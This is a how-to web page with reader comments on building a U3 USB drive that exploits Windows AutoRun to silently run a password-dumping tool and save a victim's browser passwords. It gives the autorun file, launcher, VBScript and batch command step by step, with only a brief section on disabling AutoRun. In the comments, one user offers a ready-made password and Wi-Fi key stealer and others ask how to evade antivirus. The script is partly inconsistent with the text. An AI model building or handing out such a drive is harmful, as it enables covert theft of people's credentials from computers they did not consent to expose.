loading
When it comes to computer security, sometimes it's good to know what it is that you're trying to protect yourself from. In this video, I'm going to cover the AutoRun feature in Windows and why, for security reasons, you should never use it. To prove my point, I'm going to show you how to make a USB drive that exploits the autorun feature to automatically download and save a users information just by plugging it into a USB port.

Step 1: Material List

To do this project, you are going to need:
- U3 usb drive, such as a sandisk cruizer,
- Access to a Windows XP machine.

What makes a U3 usb drive unique is that it emulates a CD rom drive so that it can autorun it's "launchpad" whenever you plug it into your computer. This is useful because Windows will not allow programs to autorun straight from a USB drive, but it will allow programs to autorun from CD drives and since a U3 usb drive shows up as both, we can use this feature to autorun our USB drive.

Step 2: Download Universal Customizer

Backup everything that's currently on your USB drive. Then go to this website: http://www.u3community.com/viewtopic.php?t=434 and download the "Universal Customizer" program. This program is going to allow us to replace the U3 Launchpad application with our own autolaunching application. Unfortunately, this program only works on Windows XP, so you'll have to have an XP machine to run this. When it's through downloading, extract all of the files to your desktop and open up the "U3CUSTOM" folder. This folder is where we're going to create our custom autolaunching program

Step 3: Creating the Autorun and Launch Files

The first thing that we want to do is create an "autorun" file, so right click within the folder and select "new > text document". Rename it as "autorun.inf" and then double click on it to open it up. Type:

[AutoRun]
open=launch.exe -a


Then click File > Save. This will autorun a program called "launch.exe" that we're going to make right now. So right click in the folder again and select "new>textdocument" and rename it "launch.bat". Then right click on it and select "edit". Now type:

\usb.vbs


Save, and close it. This will tell it to open a file called "usb.vbs" that we will create in a second. But first we need to convert the batch file to an executable that Windows can autorun.

Step 4: Converting BAT to EXE

To convert launch.bat to an executable, go to this website http://download.cnet.com/Bat-To-Exe-Converter/3000-2069_4-10555897.html and download the Bat to EXE converter. Open it up and run the exe file. For the "Batch file" field, point to the "launch.bat" file that you created. Then click "compile". You should now see a "launch.exe" file in your "U3Custom" folder.

Step 5: Creating the USB.vbs Script

Now let's create the usb.vbs file. This will find the drive letter of the USB drive so that we can automatically save stuff to it. So, create another new text document and rename it to "usb.vbs". Then right click on it and select edit. You want to type in this code:

Dim oFSO, oDrive,objFolder,oUsbDrive,oDestination, shell
Const USBDRIVE=1
oDestination = "c:\test"
Set oFSO = WScript.CreateObject("Scripting.FileSystemObject")
Set shell=createobject("wscript.shell")
'Get USB drive letter
For Each oDrive In oFSO.Drives

If oDrive.DriveType = USBDRIVE And oDrive.DriveLetter <> "A" Then
WScript.Echo "found usb at", oDrive.DriveLetter
oUsbDrive = oDrive.DriveLetter & ":\"
shell.run oDrive.DriveLetter & ":\PasswordFox.exe"
set shell=nothing
End If
Next
Sub CopyFiles(oPath, oDst)
Set objFolder = oFSO.GetFolder(oPath)
For Each Files In objFolder.Files
WScript.Echo "Copying File",Files
newDst=oDst&"\"&Files.Name
oFSO.CopyFile Files,newDst,True
WScript.Echo Err.Description
Next
'Recursive copy, uncomment if needed
' For Each oDir In objFolder.SubFolders
' CopyFiles oDir.Path, oDst
' Next
End Sub


Basically what this script does is scan the computer for a USB drive and then executes a file called "batch.bat" from that USB drive. Once you have that done, click save and exit and now we can burn this to our U3 drive.

Step 6: Burn the Files to the Virtual U3 CD

Go back up to the main "universal customizer" directory and click "isocreate.cmd". This will turn our folder into an iso file that we will then put on the USB drive. Now click on "universal_customizer.exe". Just follow the instructions in the program and it will set up your U3 drive to run our custom created launcher. When it's through, click done. You will need to pull out your usb drive and plug it back in and it may give you an error, but that's because we haven't put any programs on it, which we will do in the next step.

Step 7: Loading the Hacking Programs

You can find some good programs at "nirsoft.net" that are good for retrieving passwords and information. Such as PasswordFox. Just extract the files and copy them to your USB drive. Lastly, we need to create a USB file that runs the program silently and stores the data it collects back on the USB drive. So right click in the USB drive and create a new text file and rename it "batch.bat". Then right click on it and select "edit". To launch the program type:

start %~dp0PasswordFox.exe /shtml %~dp0firefox.html


you want to replace "PasswordFox.exe" with whatever program you downloaded. And according to the nirsoft website that we downloaded it from, if we want to save the password results as an html file, we can type /shtml firefox.html. Now to make sure that it reads it and saves it to the USB drive, we need to put "%~dp0" before both filenames. Now save the file and test it out. Put it in a computer that has autorun enabled and within a second, you should have an html file saved to your USB drive with the users information.

Step 8: Protection

The best way to protect yourself from this type of hack is to disable any type of autorun feature. To enable/disable autorun in windows xp, go to "start > run" type gpedit.msc and hit enter. Select "Administrative Templates > System" and then double click on "Turn off autoplay" to enable/disable it. In vista and 7 go to start and type "gpedit.msc", select administrative templates > Windows Components" and double click on "Autoplay policies" to enable or disable it.
can you simply do this on a CD instead?
<p>Ya, i think so</p>
<p>hi !</p><p>i have a couple of questions:</p><p>why do some hacking files like WebBrowserNetView,ChromPass,PasswordFox</p><p>are saving as a .cfg file and others save as.html like operapass...etc.</p><p>how can i fix this problem ?</p><p>hope anyone replies.</p><p>Thank you .</p>
<p>hy bro i make that all files which done all the process which u want within 10 second u can stole all passwords of a computer like all browsers password which save init.and also stole each wifi password which that computer ur laptop connected if u want that file so cntct..... www.facebook.com/shahrox.xhan.2 </p>
<p>some of this stuff cannot be done because of the Antivirus!<br>any option to do so?</p>
<p>Where can i find this the software now?</p><p>It seems the site u3community has been abandoned.</p>
<p>The U3 download link does not seem to work.</p>
how to you make it save the passwords in a text document<br>
does it work on windows 7
Can a usb, when plugged in, shut down(but remember everything) all activated processes except the OS processes (just like safe mode) and when you pull it out restore everything to the situation before you plugged in the usb? That would be a real secure usb drive..
auto run no longer works for flash drives in windows 7
Norton trashed the Password Fox exe and yelled at me that it was a virus..
ahahaha, it might be eh
um.......... i think your link u3community.com isnt working for me
Glad I do not use Microsoft Windows software.
What do you use?
Actually I do have a token xp box. Mostly use open source operating systems such as various linuxes, bsd and other os's.
Go Linux! But I have a mac. Well atleast macs cant do this instructable
I ran osx for a while on some ppc g3's till I converted them to linux. I eventually dumped those machines. On linux there is wine and and there is a corresponding open source program on mac, but I forget he name. Not sure whether you could get hose programs to work though.
Yeah to use the windows apps on linux and mac I have linux on my brothers computer with wine
http://www.google.com/#hl=en&amp;source=hp&amp;q=wine+on+osx&amp;aq=f&amp;aqi=g1g-m1&amp;aql=&amp;oq=&amp;gs_rfai=CYjiasX4kTKG-IKPuzATv7fXRCgAAAKoEBU_Qz5D1&amp;fp=abb01c78b666a2d
This is neat. Any chance there will be a Vista/7 version soon?
This works on Vista/7. You just have to initially set it up using XP because the Unverisial software only runs on XP.
Oh, OK. I have an XP machine.

About This Instructable

89,214views

111favorites

License:

More by gigafide:DIY Vintage Streaming Radio With a Raspberry Pi Turn an Old Cell Phone Into a Smartwatch Alexa Ruxpin - Arduino & Raspberry Pi Powered Voice Assistant 
Add instructable to: